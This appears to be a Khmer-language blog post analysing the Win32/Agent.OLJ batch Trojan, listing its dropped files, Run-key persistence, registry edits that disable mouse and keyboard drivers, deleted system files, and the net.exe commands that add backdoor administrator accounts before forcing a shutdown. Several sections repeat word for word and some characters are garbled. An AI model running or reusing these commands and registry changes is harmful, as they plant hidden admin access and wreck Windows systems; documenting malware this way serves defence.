I. ការអធិប្បាយ
ចាប់ផ្តើមឆ្លងនៅ: ថ្ងៃទី ០4 ខែ 03 ឆ្នាំ 2009 វេលាម៉ោង 6:36:09 AM
ឈ្មោះមេរោគ:
Win32/Agent.OLJ Win32/Agent.OLJ
ជាប្រភេទមេរោគ: Trojan
ជាប្រភេទមេរោគ: Trojan
ទំហំ: 4286 Byte
វាធ្វើអោយខូចខាងប្រព័ន្ធ: Microsoft Windows
II)
វាចូលផ្ទុកក្នុងប្រព័ន្ធ
ពេលមេរោគ Trojan បានបង្កើតជា file ដែលផ្ទុកក្នុង %temp%\bt% variable%.bat� %windir%\Command\Command.bat (4286 Byte)
%userprofile%\startm~1\Programme\Autostart\%variable%.bat (4286 Byte) និងក្នុង C:\Dokumente und Einstellungen\All Users\Startmen�\Programme\Autostart\Command.bat (4286 Byte) C:\Programm Files\bt%variable%.bat (4286 Byte)
វាបានផ្លាស់ប្តូរក្នុង %variable%។ មេរោគ Trojan នេះបានចូលក្នុងជាប់ក្នុង Registry។
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]"Winlogon" = "%windir%\Command\Command.bat"
The following Registry entries are set: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Mouclass]
"Start" = 4
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Kbdclass]
"Start" = 4
ពេលមេរោគ Trojan បានបង្កើតជា file ដែលផ្ទុកក្នុង %temp%\bt% variable%.bat� %windir%\Command\Command.bat (4286 Byte)
%userprofile%\startm~1\Programme\Autostart\%variable%.bat (4286 Byte) និងក្នុង C:\Dokumente und Einstellungen\All Users\Startmen�\Programme\Autostart\Command.bat (4286 Byte) C:\Programm Files\bt%variable%.bat (4286 Byte)
វាបានផ្លាស់ប្តូរក្នុង %variable%។ មេរោគ Trojan នេះបានចូលក្នុងជាប់ក្នុង Registry។
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]"Winlogon" = "%windir%\Command\Command.bat"
The following Registry entries are set: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Mouclass]
"Start" = 4
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Kbdclass]
"Start" = 4
- avgnt.exe
- avguard.exe
- taskmgr.exe
- explorer.exe
- lsass.exe
ដើម្បីច្បាស់លោកអ្នកចុចពីរដងលើរូបភាពខាងលើ ឃើញ file
ខាងក្រោមត្រូវ
លប់ចោល។C:\*.sys
C:\*.bin
C:\*.bat
%system%\bootvid.dll
%system%\explorer.exe
%system%\logon.scr
%system%\logonui.exe
%system%\logonui.exe.manifest
%system%\lsass.exe
%system%\seclogon.dll
%system%\taskmgr.exe
%system%\usrlogon.cmd
%system%\WindowsLogon.manifest
%system%\winlogon.exe
%system%\dllcache\logon.scr
%system%\dllcache\logonui.exe
%system%\dllcache\winlogon.exe
%windir%\bootstat.dat
%windir%\explorer.exe
%windir%\Cursors\*.*
%windir%\Prefetch\NTOSBOOT-B00DFAAD.pf
%userprofile%\NTUSER.dat
ព័ត៌មានផ្សេងពីមេរោគ
ព័ត៌មានផ្សេងពីមេរោគ
ក្រោយពេលមេរោគបានវាយប្រហារក្នុងម៉ាស៊ី
មេរោគ Trojan បានបង្កើត
ដំណើរការដូចខាងក្រោម:
iexplore.exe www.batch-rockz.dl.am
net.exe user "-Sph1nX-" "0wn3d" /add"
net.exe localgroup Administratoren "-Sph1nX-" /add
net.exe user "Sph1nX - %random%" "%random%" /add
net.exe localgroup Administratoren "Sph1nX - %random%" /add
shutdown.exe -s -t 30 -c "%username% g0t 0wn3d bY -Sph1nX-"
បណ្តាសេរវាដែលមេរោគបានបង្កើត
AntiVirService
cryptsvc
Designs
Anmeldedienst
avgnt.exe
avguard.exe
taskmgr.exe
explorer.exe
lsass.exe
ក្រោយមកមេរោគ Trojan និងបង្ហាញរូបភាពខាងក្រោម
iexplore.exe www.batch-rockz.dl.am
net.exe user "-Sph1nX-" "0wn3d" /add"
net.exe localgroup Administratoren "-Sph1nX-" /add
net.exe user "Sph1nX - %random%" "%random%" /add
net.exe localgroup Administratoren "Sph1nX - %random%" /add
shutdown.exe -s -t 30 -c "%username% g0t 0wn3d bY -Sph1nX-"
បណ្តាសេរវាដែលមេរោគបានបង្កើត
AntiVirService
cryptsvc
Designs
Anmeldedienst
avgnt.exe
avguard.exe
taskmgr.exe
explorer.exe
lsass.exe
ក្រោយមកមេរោគ Trojan និងបង្ហាញរូបភាពខាងក្រោម
Post a Comment